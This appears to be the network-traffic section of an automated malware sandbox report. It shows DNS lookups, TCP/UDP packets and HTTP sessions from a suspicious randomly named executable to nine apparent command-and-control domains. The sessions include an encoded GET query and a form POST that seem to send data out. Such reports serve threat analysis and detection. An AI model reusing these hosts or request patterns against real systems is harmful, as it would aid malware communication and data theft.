                                                              Nov 24, 2024 08:36:12.737122059 CET8049991104.21.88.139192.168.2.7
                                                              Nov 24, 2024 08:36:13.959289074 CET8049991104.21.88.139192.168.2.7
                                                              Nov 24, 2024 08:36:13.959383965 CET8049991104.21.88.139192.168.2.7
                                                              Nov 24, 2024 08:36:13.959439993 CET4999180192.168.2.7104.21.88.139
                                                              Nov 24, 2024 08:36:13.959477901 CET8049991104.21.88.139192.168.2.7
                                                              Nov 24, 2024 08:36:13.959526062 CET4999180192.168.2.7104.21.88.139
                                                              Nov 24, 2024 08:36:14.134351969 CET4999180192.168.2.7104.21.88.139
                                                              Nov 24, 2024 08:36:15.152704954 CET4999280192.168.2.7104.21.88.139
                                                              Nov 24, 2024 08:36:15.272300005 CET8049992104.21.88.139192.168.2.7
                                                              Nov 24, 2024 08:36:15.272573948 CET4999280192.168.2.7104.21.88.139
                                                              Nov 24, 2024 08:36:15.282082081 CET4999280192.168.2.7104.21.88.139
                                                              Nov 24, 2024 08:36:15.401536942 CET8049992104.21.88.139192.168.2.7
                                                              Nov 24, 2024 08:36:16.535341978 CET8049992104.21.88.139192.168.2.7
                                                              Nov 24, 2024 08:36:16.535377979 CET8049992104.21.88.139192.168.2.7
                                                              Nov 24, 2024 08:36:16.535636902 CET4999280192.168.2.7104.21.88.139
                                                              Nov 24, 2024 08:36:16.535698891 CET8049992104.21.88.139192.168.2.7
                                                              Nov 24, 2024 08:36:16.535754919 CET4999280192.168.2.7104.21.88.139
                                                              Nov 24, 2024 08:36:16.539700985 CET4999280192.168.2.7104.21.88.139
                                                              Nov 24, 2024 08:36:16.659250975 CET8049992104.21.88.139192.168.2.7
                                                              Nov 24, 2024 08:36:22.262887955 CET4999380192.168.2.7185.106.208.3
                                                              Nov 24, 2024 08:36:22.382694006 CET8049993185.106.208.3192.168.2.7
                                                              Nov 24, 2024 08:36:22.382837057 CET4999380192.168.2.7185.106.208.3
                                                              Nov 24, 2024 08:36:22.399091005 CET4999380192.168.2.7185.106.208.3
                                                              Nov 24, 2024 08:36:22.518707037 CET8049993185.106.208.3192.168.2.7
                                                              Nov 24, 2024 08:36:23.848117113 CET8049993185.106.208.3192.168.2.7
                                                              Nov 24, 2024 08:36:23.848475933 CET8049993185.106.208.3192.168.2.7
                                                              Nov 24, 2024 08:36:23.848584890 CET4999380192.168.2.7185.106.208.3
                                                              Nov 24, 2024 08:36:23.915350914 CET4999380192.168.2.7185.106.208.3
                                                              Nov 24, 2024 08:36:24.934314966 CET4999480192.168.2.7185.106.208.3
                                                              Nov 24, 2024 08:36:25.053968906 CET8049994185.106.208.3192.168.2.7
                                                              Nov 24, 2024 08:36:25.054132938 CET4999480192.168.2.7185.106.208.3
                                                              Nov 24, 2024 08:36:25.075448036 CET4999480192.168.2.7185.106.208.3
                                                              Nov 24, 2024 08:36:25.195178032 CET8049994185.106.208.3192.168.2.7
                                                              Nov 24, 2024 08:36:26.587272882 CET4999480192.168.2.7185.106.208.3
                                                              Nov 24, 2024 08:36:26.596673012 CET8049994185.106.208.3192.168.2.7
                                                              Nov 24, 2024 08:36:26.596704960 CET8049994185.106.208.3192.168.2.7
                                                              Nov 24, 2024 08:36:26.596915960 CET4999480192.168.2.7185.106.208.3
                                                              Nov 24, 2024 08:36:26.597105980 CET4999480192.168.2.7185.106.208.3
                                                              Nov 24, 2024 08:36:26.706779957 CET8049994185.106.208.3192.168.2.7
                                                              Nov 24, 2024 08:36:26.707289934 CET4999480192.168.2.7185.106.208.3
                                                              Nov 24, 2024 08:36:27.605417967 CET4999580192.168.2.7185.106.208.3
                                                              Nov 24, 2024 08:36:27.725164890 CET8049995185.106.208.3192.168.2.7
                                                              Nov 24, 2024 08:36:27.725337982 CET4999580192.168.2.7185.106.208.3
                                                              Nov 24, 2024 08:36:27.740742922 CET4999580192.168.2.7185.106.208.3
                                                              Nov 24, 2024 08:36:27.860382080 CET8049995185.106.208.3192.168.2.7
                                                              Nov 24, 2024 08:36:27.860392094 CET8049995185.106.208.3192.168.2.7
                                                              Nov 24, 2024 08:36:29.126285076 CET8049995185.106.208.3192.168.2.7
                                                              Nov 24, 2024 08:36:29.180862904 CET4999580192.168.2.7185.106.208.3
                                                              Nov 24, 2024 08:36:29.262885094 CET8049995185.106.208.3192.168.2.7
                                                              Nov 24, 2024 08:36:29.263022900 CET4999580192.168.2.7185.106.208.3
                                                              Nov 24, 2024 08:36:29.269685030 CET4999580192.168.2.7185.106.208.3
                                                              Nov 24, 2024 08:36:30.284854889 CET4999680192.168.2.7185.106.208.3
                                                              Nov 24, 2024 08:36:30.404484034 CET8049996185.106.208.3192.168.2.7
                                                              Nov 24, 2024 08:36:30.404681921 CET4999680192.168.2.7185.106.208.3
                                                              Nov 24, 2024 08:36:30.421518087 CET4999680192.168.2.7185.106.208.3
                                                              Nov 24, 2024 08:36:30.541502953 CET8049996185.106.208.3192.168.2.7
                                                              Nov 24, 2024 08:36:31.806364059 CET8049996185.106.208.3192.168.2.7
                                                              Nov 24, 2024 08:36:31.806391954 CET8049996185.106.208.3192.168.2.7
                                                              Nov 24, 2024 08:36:31.806562901 CET4999680192.168.2.7185.106.208.3
                                                              Nov 24, 2024 08:36:31.825962067 CET4999680192.168.2.7185.106.208.3
                                                              Nov 24, 2024 08:36:31.945452929 CET8049996185.106.208.3192.168.2.7
                                                              Nov 24, 2024 08:36:37.240674973 CET4999780192.168.2.713.248.169.48
                                                              Nov 24, 2024 08:36:37.360265017 CET804999713.248.169.48192.168.2.7
                                                              Nov 24, 2024 08:36:37.360385895 CET4999780192.168.2.713.248.169.48
                                                              Nov 24, 2024 08:36:37.375343084 CET4999780192.168.2.713.248.169.48
                                                              Nov 24, 2024 08:36:37.494906902 CET804999713.248.169.48192.168.2.7
                                                              Nov 24, 2024 08:36:38.524811029 CET804999713.248.169.48192.168.2.7
                                                              Nov 24, 2024 08:36:38.525049925 CET4999780192.168.2.713.248.169.48
                                                              Nov 24, 2024 08:36:38.884129047 CET4999780192.168.2.713.248.169.48
                                                              Nov 24, 2024 08:36:39.003704071 CET804999713.248.169.48192.168.2.7
                                                              Nov 24, 2024 08:36:39.902905941 CET4999880192.168.2.713.248.169.48
                                                              Nov 24, 2024 08:36:40.022574902 CET804999813.248.169.48192.168.2.7
                                                              Nov 24, 2024 08:36:40.022758961 CET4999880192.168.2.713.248.169.48
                                                              Nov 24, 2024 08:36:40.039668083 CET4999880192.168.2.713.248.169.48
                                                              Nov 24, 2024 08:36:40.159244061 CET804999813.248.169.48192.168.2.7
                                                              Nov 24, 2024 08:36:41.219338894 CET804999813.248.169.48192.168.2.7
                                                              Nov 24, 2024 08:36:41.219414949 CET4999880192.168.2.713.248.169.48
                                                              Nov 24, 2024 08:36:41.556202888 CET4999880192.168.2.713.248.169.48
                                                              Nov 24, 2024 08:36:41.676872969 CET804999813.248.169.48192.168.2.7
                                                              Nov 24, 2024 08:36:42.574847937 CET4999980192.168.2.713.248.169.48
                                                              Nov 24, 2024 08:36:42.694691896 CET804999913.248.169.48192.168.2.7
                                                              Nov 24, 2024 08:36:42.694895983 CET4999980192.168.2.713.248.169.48
                                                              Nov 24, 2024 08:36:42.708466053 CET4999980192.168.2.713.248.169.48
                                                              Nov 24, 2024 08:36:42.828059912 CET804999913.248.169.48192.168.2.7
                                                              Nov 24, 2024 08:36:42.828098059 CET804999913.248.169.48192.168.2.7
                                                              Nov 24, 2024 08:36:43.886450052 CET804999913.248.169.48192.168.2.7
                                                              Nov 24, 2024 08:36:43.886687994 CET4999980192.168.2.713.248.169.48
                                                              Nov 24, 2024 08:36:44.212388992 CET4999980192.168.2.713.248.169.48
                                                              Nov 24, 2024 08:36:44.332133055 CET804999913.248.169.48192.168.2.7
                                                              Nov 24, 2024 08:36:45.235274076 CET5000080192.168.2.713.248.169.48
                                                              Nov 24, 2024 08:36:45.354809046 CET805000013.248.169.48192.168.2.7
                                                              Nov 24, 2024 08:36:45.354913950 CET5000080192.168.2.713.248.169.48
                                                              Nov 24, 2024 08:36:45.363579988 CET5000080192.168.2.713.248.169.48
                                                              Nov 24, 2024 08:36:45.483072996 CET805000013.248.169.48192.168.2.7
                                                              Nov 24, 2024 08:36:46.501184940 CET805000013.248.169.48192.168.2.7
                                                              Nov 24, 2024 08:36:46.501283884 CET805000013.248.169.48192.168.2.7
                                                              Nov 24, 2024 08:36:46.501539946 CET5000080192.168.2.713.248.169.48
                                                              Nov 24, 2024 08:36:46.511284113 CET5000080192.168.2.713.248.169.48
                                                              Nov 24, 2024 08:36:46.631784916 CET805000013.248.169.48192.168.2.7
                                                              Nov 24, 2024 08:36:52.028317928 CET5000180192.168.2.73.33.130.190
                                                              Nov 24, 2024 08:36:52.147917986 CET80500013.33.130.190192.168.2.7
                                                              Nov 24, 2024 08:36:52.148092031 CET5000180192.168.2.73.33.130.190
                                                              Nov 24, 2024 08:36:52.163058996 CET5000180192.168.2.73.33.130.190
                                                              Nov 24, 2024 08:36:52.283499956 CET80500013.33.130.190192.168.2.7
                                                              Nov 24, 2024 08:36:53.341420889 CET80500013.33.130.190192.168.2.7
                                                              Nov 24, 2024 08:36:53.341487885 CET5000180192.168.2.73.33.130.190
                                                              Nov 24, 2024 08:36:54.306034088 CET5000180192.168.2.73.33.130.190
                                                              Nov 24, 2024 08:36:54.425662041 CET80500013.33.130.190192.168.2.7

                                                              UDP Packets

                                                              TimestampSource PortDest PortSource IPDest IP
                                                              Nov 24, 2024 08:34:47.080921888 CET5222053192.168.2.71.1.1.1
                                                              Nov 24, 2024 08:34:47.824594021 CET53522201.1.1.1192.168.2.7
                                                              Nov 24, 2024 08:35:04.715646982 CET5570353192.168.2.71.1.1.1
                                                              Nov 24, 2024 08:35:05.112046957 CET53557031.1.1.1192.168.2.7
                                                              Nov 24, 2024 08:35:19.795044899 CET5152953192.168.2.71.1.1.1
                                                              Nov 24, 2024 08:35:20.592747927 CET53515291.1.1.1192.168.2.7
                                                              Nov 24, 2024 08:35:34.982065916 CET6466453192.168.2.71.1.1.1
                                                              Nov 24, 2024 08:35:35.993454933 CET6466453192.168.2.71.1.1.1
                                                              Nov 24, 2024 08:35:36.249638081 CET53646641.1.1.1192.168.2.7
                                                              Nov 24, 2024 08:35:36.249716043 CET53646641.1.1.1192.168.2.7
                                                              Nov 24, 2024 08:35:51.107140064 CET5109353192.168.2.71.1.1.1
                                                              Nov 24, 2024 08:35:52.031763077 CET53510931.1.1.1192.168.2.7
                                                              Nov 24, 2024 08:36:06.826025009 CET4956353192.168.2.71.1.1.1
                                                              Nov 24, 2024 08:36:07.162439108 CET53495631.1.1.1192.168.2.7
                                                              Nov 24, 2024 08:36:21.559842110 CET5599753192.168.2.71.1.1.1
                                                              Nov 24, 2024 08:36:22.257879972 CET53559971.1.1.1192.168.2.7
                                                              Nov 24, 2024 08:36:36.840876102 CET6358353192.168.2.71.1.1.1
                                                              Nov 24, 2024 08:36:37.238022089 CET53635831.1.1.1192.168.2.7
                                                              Nov 24, 2024 08:36:51.528667927 CET5943653192.168.2.71.1.1.1
                                                              Nov 24, 2024 08:36:52.025985003 CET53594361.1.1.1192.168.2.7

                                                              DNS Queries

                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                              Nov 24, 2024 08:34:47.080921888 CET192.168.2.71.1.1.10xa227Standard query (0)www.n-vis.groupA (IP address)IN (0x0001)false
                                                              Nov 24, 2024 08:35:04.715646982 CET192.168.2.71.1.1.10xcc69Standard query (0)www.losmason.shopA (IP address)IN (0x0001)false
                                                              Nov 24, 2024 08:35:19.795044899 CET192.168.2.71.1.1.10xa2a9Standard query (0)www.dialagiaja18.buzzA (IP address)IN (0x0001)false
                                                              Nov 24, 2024 08:35:34.982065916 CET192.168.2.71.1.1.10x79b7Standard query (0)www.395608.menA (IP address)IN (0x0001)false
                                                              Nov 24, 2024 08:35:35.993454933 CET192.168.2.71.1.1.10x79b7Standard query (0)www.395608.menA (IP address)IN (0x0001)false
                                                              Nov 24, 2024 08:35:51.107140064 CET192.168.2.71.1.1.10x17aeStandard query (0)www.gkfundeis.netA (IP address)IN (0x0001)false
                                                              Nov 24, 2024 08:36:06.826025009 CET192.168.2.71.1.1.10x9935Standard query (0)www.incgruporxat.clickA (IP address)IN (0x0001)false
                                                              Nov 24, 2024 08:36:21.559842110 CET192.168.2.71.1.1.10xde3aStandard query (0)www.holytur.netA (IP address)IN (0x0001)false
                                                              Nov 24, 2024 08:36:36.840876102 CET192.168.2.71.1.1.10x691aStandard query (0)www.lirio.shopA (IP address)IN (0x0001)false
                                                              Nov 24, 2024 08:36:51.528667927 CET192.168.2.71.1.1.10x32dcStandard query (0)www.espiritismo.infoA (IP address)IN (0x0001)false

                                                              DNS Answers

                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                              Nov 24, 2024 08:34:47.824594021 CET1.1.1.1192.168.2.70xa227No error (0)www.n-vis.group90.156.201.74A (IP address)IN (0x0001)false
                                                              Nov 24, 2024 08:34:47.824594021 CET1.1.1.1192.168.2.70xa227No error (0)www.n-vis.group90.156.201.18A (IP address)IN (0x0001)false
                                                              Nov 24, 2024 08:34:47.824594021 CET1.1.1.1192.168.2.70xa227No error (0)www.n-vis.group90.156.201.66A (IP address)IN (0x0001)false
                                                              Nov 24, 2024 08:34:47.824594021 CET1.1.1.1192.168.2.70xa227No error (0)www.n-vis.group90.156.201.112A (IP address)IN (0x0001)false
                                                              Nov 24, 2024 08:35:05.112046957 CET1.1.1.1192.168.2.70xcc69No error (0)www.losmason.shop104.18.73.116A (IP address)IN (0x0001)false
                                                              Nov 24, 2024 08:35:20.592747927 CET1.1.1.1192.168.2.70xa2a9No error (0)www.dialagiaja18.buzzdialagiaja18.buzzCNAME (Canonical name)IN (0x0001)false
                                                              Nov 24, 2024 08:35:20.592747927 CET1.1.1.1192.168.2.70xa2a9No error (0)dialagiaja18.buzz66.29.148.78A (IP address)IN (0x0001)false
                                                              Nov 24, 2024 08:35:36.249638081 CET1.1.1.1192.168.2.70x79b7No error (0)www.395608.menlc7.cdnlaochen.comCNAME (Canonical name)IN (0x0001)false
                                                              Nov 24, 2024 08:35:36.249638081 CET1.1.1.1192.168.2.70x79b7No error (0)lc7.cdnlaochen.comrexw2u6y-u.fly8899.comCNAME (Canonical name)IN (0x0001)false
                                                              Nov 24, 2024 08:35:36.249638081 CET1.1.1.1192.168.2.70x79b7No error (0)rexw2u6y-u.fly8899.com5w23j7d4.n.fly8899.comCNAME (Canonical name)IN (0x0001)false
                                                              Nov 24, 2024 08:35:36.249638081 CET1.1.1.1192.168.2.70x79b7No error (0)5w23j7d4.n.fly8899.com207.148.38.19A (IP address)IN (0x0001)false
                                                              Nov 24, 2024 08:35:36.249638081 CET1.1.1.1192.168.2.70x79b7No error (0)5w23j7d4.n.fly8899.com103.144.218.47A (IP address)IN (0x0001)false
                                                              Nov 24, 2024 08:35:36.249638081 CET1.1.1.1192.168.2.70x79b7No error (0)5w23j7d4.n.fly8899.com66.203.149.226A (IP address)IN (0x0001)false
                                                              Nov 24, 2024 08:35:36.249716043 CET1.1.1.1192.168.2.70x79b7No error (0)www.395608.menlc7.cdnlaochen.comCNAME (Canonical name)IN (0x0001)false
                                                              Nov 24, 2024 08:35:36.249716043 CET1.1.1.1192.168.2.70x79b7No error (0)lc7.cdnlaochen.comrexw2u6y-u.fly8899.comCNAME (Canonical name)IN (0x0001)false
                                                              Nov 24, 2024 08:35:36.249716043 CET1.1.1.1192.168.2.70x79b7No error (0)rexw2u6y-u.fly8899.com5w23j7d4.n.fly8899.comCNAME (Canonical name)IN (0x0001)false
                                                              Nov 24, 2024 08:35:36.249716043 CET1.1.1.1192.168.2.70x79b7No error (0)5w23j7d4.n.fly8899.com207.148.38.19A (IP address)IN (0x0001)false
                                                              Nov 24, 2024 08:35:36.249716043 CET1.1.1.1192.168.2.70x79b7No error (0)5w23j7d4.n.fly8899.com103.144.218.47A (IP address)IN (0x0001)false
                                                              Nov 24, 2024 08:35:36.249716043 CET1.1.1.1192.168.2.70x79b7No error (0)5w23j7d4.n.fly8899.com66.203.149.226A (IP address)IN (0x0001)false
                                                              Nov 24, 2024 08:35:52.031763077 CET1.1.1.1192.168.2.70x17aeNo error (0)www.gkfundeis.net62.116.130.8A (IP address)IN (0x0001)false
                                                              Nov 24, 2024 08:36:07.162439108 CET1.1.1.1192.168.2.70x9935No error (0)www.incgruporxat.click104.21.88.139A (IP address)IN (0x0001)false
                                                              Nov 24, 2024 08:36:07.162439108 CET1.1.1.1192.168.2.70x9935No error (0)www.incgruporxat.click172.67.180.24A (IP address)IN (0x0001)false
                                                              Nov 24, 2024 08:36:22.257879972 CET1.1.1.1192.168.2.70xde3aNo error (0)www.holytur.netholytur.netCNAME (Canonical name)IN (0x0001)false
                                                              Nov 24, 2024 08:36:22.257879972 CET1.1.1.1192.168.2.70xde3aNo error (0)holytur.net185.106.208.3A (IP address)IN (0x0001)false
                                                              Nov 24, 2024 08:36:37.238022089 CET1.1.1.1192.168.2.70x691aNo error (0)www.lirio.shop13.248.169.48A (IP address)IN (0x0001)false
                                                              Nov 24, 2024 08:36:37.238022089 CET1.1.1.1192.168.2.70x691aNo error (0)www.lirio.shop76.223.54.146A (IP address)IN (0x0001)false
                                                              Nov 24, 2024 08:36:52.025985003 CET1.1.1.1192.168.2.70x32dcNo error (0)www.espiritismo.infoespiritismo.infoCNAME (Canonical name)IN (0x0001)false
                                                              Nov 24, 2024 08:36:52.025985003 CET1.1.1.1192.168.2.70x32dcNo error (0)espiritismo.info3.33.130.190A (IP address)IN (0x0001)false
                                                              Nov 24, 2024 08:36:52.025985003 CET1.1.1.1192.168.2.70x32dcNo error (0)espiritismo.info15.197.148.33A (IP address)IN (0x0001)false

                                                              HTTP Request Dependency Graph

                                                              • www.n-vis.group
                                                              • www.losmason.shop
                                                              • www.dialagiaja18.buzz
                                                              • www.395608.men
                                                              • www.gkfundeis.net
                                                              • www.incgruporxat.click
                                                              • www.holytur.net
                                                              • www.lirio.shop
                                                              • www.espiritismo.info

                                                              HTTP Packets

                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              0192.168.2.74980890.156.201.7480520C:\Program Files (x86)\MFZHvabWtuJetfpcmtpejNmfKqSQVzLyHOuSFTAjQDeWYaSiiiAFJUuLKRfoRTNAN\lavilIyGJqg.exe
                                                              TimestampBytes transferredDirectionData
                                                              Nov 24, 2024 08:34:47.971215963 CET458OUTGET /lqir/?Yh8=pl0prhRpj&jp30l4Dh=1XT9/+lPoo+/65GBoLqjY96keXaDBPxKxMdORwDZG72wNLr1ipw6qktNsrB2GbsuFZNPMrA1oNmR/zLhPkjCxZ4ItMmlXe/h8K4U/QJ8SGl7q4T2nCxnDw61Qoew6MKI2b3ZeSUeI0MH HTTP/1.1
                                                              Host: www.n-vis.group
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Accept-Language: en-US
                                                              Connection: close
                                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1036 Safari/532.5
                                                              Nov 24, 2024 08:34:49.393601894 CET1236INHTTP/1.1 200 OK
                                                              Date: Sun, 24 Nov 2024 07:34:49 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              Vary: Accept-Encoding
                                                              Server: Apache
                                                              Cache-Control: max-age=0
                                                              Expires: Sun, 24 Nov 2024 07:34:49 GMT
                                                              Data Raw: 35 66 32 63 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 72 75 22 3e 0a 0a 3c 68 65 61 64 3e 0a 3c 21 2d 2d 20 59 61 6e 64 65 78 2e 4d 65 74 72 69 6b 61 20 63 6f 75 6e 74 65 72 20 2d 2d 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 3e 0a 20 20 20 28 66 75 6e 63 74 69 6f 6e 28 6d 2c 65 2c 74 2c 72 2c 69 2c 6b 2c 61 29 7b 6d 5b 69 5d 3d 6d 5b 69 5d 7c 7c 66 75 6e 63 74 69 6f 6e 28 29 7b 28 6d 5b 69 5d 2e 61 3d 6d 5b 69 5d 2e 61 7c 7c 5b 5d 29 2e 70 75 73 68 28 61 72 67 75 6d 65 6e 74 73 29 7d 3b 0a 20 20 20 6d 5b 69 5d 2e 6c 3d 31 2a 6e 65 77 20 44 61 74 65 28 29 3b 0a 20 20 20 66 6f 72 20 28 76 61 72 20 6a 20 3d 20 30 3b 20 6a 20 3c 20 64 6f 63 75 6d 65 6e 74 2e 73 63 72 69 70 74 73 2e 6c 65 6e 67 74 68 3b 20 6a 2b 2b 29 20 7b 69 66 20 28 64 6f 63 75 6d 65 6e 74 2e 73 63 72 69 70 74 73 5b 6a 5d 2e 73 72 63 20 3d 3d 3d 20 72 29 20 7b 20 72 65 74 75 72 6e 3b 20 7d 7d 0a 20 20 20 6b 3d 65 2e 63 72 65 61 74 [TRUNCATED]
                                                              Data Ascii: 5f2c<!doctype html><html lang="ru"><head>... Yandex.Metrika counter --><script type="text/javascript" > (function(m,e,t,r,i,k,a){m[i]=m[i]||function(){(m[i].a=m[i].a||[]).push(arguments)}; m[i].l=1*new Date(); for (var j = 0; j < document.scripts.length; j++) {if (document.scripts[j].src === r) { return; }} k=e.createElement(t),a=e.getElementsByTagName(t)[0],k.async=1,k.src=r,a.parentNode.insertBefore(k,a)}) (window, document, "script", "https://mc.yandex.ru/metrika/tag.js", "ym"); ym(97952577, "init", { clickmap:true, trackLinks:true, accurateTrackBounce:true, webvisor:true });</script><noscript><div><img src="https://mc.yandex.ru/watch/97952577" style="position:absolute; left:-9999px;" alt="" /></div></noscript>... /Yandex.Metrika counter --> <meta charset="UTF-8"> <title> </title> <meta name="description" content="
                                                              Nov 24, 2024 08:34:49.393649101 CET1236INData Raw: d0 b2 d1 80 d0 b5 d0 bc d1 8f 20 d0 bf d0 be d1 81 d0 bc d0 be d1 82 d1 80 d0 b5 d1 82 d1 8c 20 d0 bd d0 b0 20 d1 80 d0 b5 d0 ba d0 bb d0 b0 d0 bc d1 83 20 d0 9f d0 9e 2d d0 9d d0 9e d0 92 d0 9e d0 9c d0 a3 21 20 d0 9f d1 80 d0 be d0 b4 d1 8e d1
                                                              Data Ascii: -! !"> <link rel="shortcut icon" href="/landing/i
                                                              Nov 24, 2024 08:34:49.393673897 CET1236INData Raw: d0 bb d0 b8 d1 87 d0 b8 d1 8f 3c 2f 61 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 23 70 61 72 74 6e 65 72 73 22 3e d0 9f d0 b0 d1 80 d1 82 d0 bd d0 b5 d1 80 d1 8b 3c 2f 61 3e 3c 2f
                                                              Data Ascii: </a></li> <li><a href="#partners"></a></li> <li><a href="#clients"></a></li> <li><a href="#contacts"></a></li> </ul>
                                                              Nov 24, 2024 08:34:49.393692970 CET672INData Raw: d1 82 d1 80 d0 b8 d0 bc 20 d0 bd d0 b0 20 d1 80 d0 b5 d0 ba d0 bb d0 b0 d0 bc d1 83 20 d0 bf d0 be 2d d0 bd d0 be d0 b2 d0 be d0 bc d1 83 3f 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20
                                                              Data Ascii: -? </p> </div> <button class="hero__down"> <svg xmlns="http://www.w3.org/2000/svg" width="56" height="56" viewbox="0 0 56 56" fill="none"> <path
                                                              Nov 24, 2024 08:34:49.393698931 CET1236INData Raw: 73 65 2d 32 2e 70 6e 67 22 20 61 6c 74 3d 22 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 22 3e 0a
                                                              Data Ascii: se-2.png" alt=""> <div class="container"> <div class="col"> <img src="/landing/img/percent.png" alt=""> </div> <div class="col"> <p>
                                                              Nov 24, 2024 08:34:49.393718958 CET1236INData Raw: 6d 2d 64 65 73 63 72 22 3e d0 b2 d0 bc d0 b5 d1 81 d1 82 d0 be 20 d1 81 d1 82 d0 b0 d0 bd d0 b4 d0 b0 d1 80 d1 82 d0 bd d0 be d0 b9 20 d1 80 d0 b5 d0 ba d0 bb d0 b0 d0 bc d1 8b 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69
                                                              Data Ascii: m-descr"> </p> </div> <div class="features__item"> <img src="/landing/img/icon-3.png" alt=""> <p class="features__item-name">
                                                              Nov 24, 2024 08:34:49.393724918 CET1236INData Raw: 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 70 72 6f 64 75 63 69 6e 67 5f 5f 69 74 65 6d 2d 6e 61 6d 65 22 3e d0 98 d0 bd d1 82 d0 b5 d0 b3 d1 80 d0 b0 d1 86 d0 b8 d1 8f 3c 2f 70 3e 0a 20 20 20 20 20 20 20
                                                              Data Ascii: > <p class="producing__item-name"></p> <img src="/landing/img/pic-1.jpg" alt=""> <ul> <li></li> <li> </li>
                                                              Nov 24, 2024 08:34:49.393735886 CET1236INData Raw: 2d 34 2e 6a 70 67 22 20 61 6c 74 3d 22 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 75 6c 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e d0 91 d0 bb d0 b0 d0 b3 d0 be d1 82 d0 b2 d0 be d1 80 d0 b8 d1 82 d0
                                                              Data Ascii: -4.jpg" alt=""> <ul> <li> </li> <li> </li> </ul> </div> </div> <a href=
                                                              Nov 24, 2024 08:34:49.393742085 CET1236INData Raw: 33 2e 37 38 31 32 35 20 34 2e 39 32 31 38 38 20 36 2e 31 32 35 20 33 2e 31 37 31 38 38 43 38 2e 34 36 38 37 35 20 31 2e 34 32 31 38 38 20 31 31 2e 30 39 33 38 20 30 2e 35 33 31 32 35 20 31 34 20 30 2e 35 43 31 36 2e 39 30 36 32 20 30 2e 35 33 31
                                                              Data Ascii: 3.78125 4.92188 6.125 3.17188C8.46875 1.42188 11.0938 0.53125 14 0.5C16.9062 0.53125 19.5312 1.42188 21.875 3.17188C24.2188 4.92188 26.0469 7.25 27.3594 10.1562ZM20.75 11C20.6875 9.09375 20.0312 7.5 18.7812 6.21875C17.5 4.96875 15.9062 4.3125
                                                              Nov 24, 2024 08:34:49.393753052 CET1236INData Raw: d0 b2 d0 bd d0 b8 d0 bc d0 b0 d0 bd d0 b8 d0 b5 20 d0 bd d0 b0 c2 a0 d0 b8 d0 bd d1 82 d0 b5 d0 b3 d1 80 d0 b0 d1 86 d0 b8 d0 b8 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                              Data Ascii: </p> </div> <div class="effect__item"> <div class="effect__item-icon"> <svg xmlns="http://www.w3.org/2000/svg" width="28" height="22" view
                                                              Nov 24, 2024 08:34:49.513791084 CET1236INData Raw: 20 31 38 2e 34 36 38 38 20 39 2e 37 31 38 37 35 20 31 38 2e 35 20 31 31 43 31 38 2e 34 36 38 38 20 31 32 2e 32 38 31 32 20 31 38 2e 30 33 31 32 20 31 33 2e 33 34 33 38 20 31 37 2e 31 38 37 35 20 31 34 2e 31 38 37 35 43 31 36 2e 33 34 33 38 20 31
                                                              Data Ascii: 18.4688 9.71875 18.5 11C18.4688 12.2812 18.0312 13.3438 17.1875 14.1875C16.3438 15.0312 15.2812 15.4688 14 15.5C12.7188 15.4688 11.6562 15.0312 10.8125 14.1875C9.96875 13.3125 9.53125 12.25 9.5 11C9.5 10.9062 9.5 10.7969 9.5 10.6719C9.53125 1


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              1192.168.2.749849104.18.73.11680520C:\Program Files (x86)\MFZHvabWtuJetfpcmtpejNmfKqSQVzLyHOuSFTAjQDeWYaSiiiAFJUuLKRfoRTNAN\lavilIyGJqg.exe
                                                              TimestampBytes transferredDirectionData
                                                              Nov 24, 2024 08:35:05.251280069 CET725OUTPOST /uktz/ HTTP/1.1
                                                              Host: www.losmason.shop
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Accept-Language: en-US
                                                              Accept-Encoding: gzip, deflate, br
                                                              Origin: http://www.losmason.shop
                                                              Referer: http://www.losmason.shop/uktz/
                                                              Content-Length: 221
                                                              Connection: close
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Cache-Control: max-age=0
                                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1036 Safari/532.5
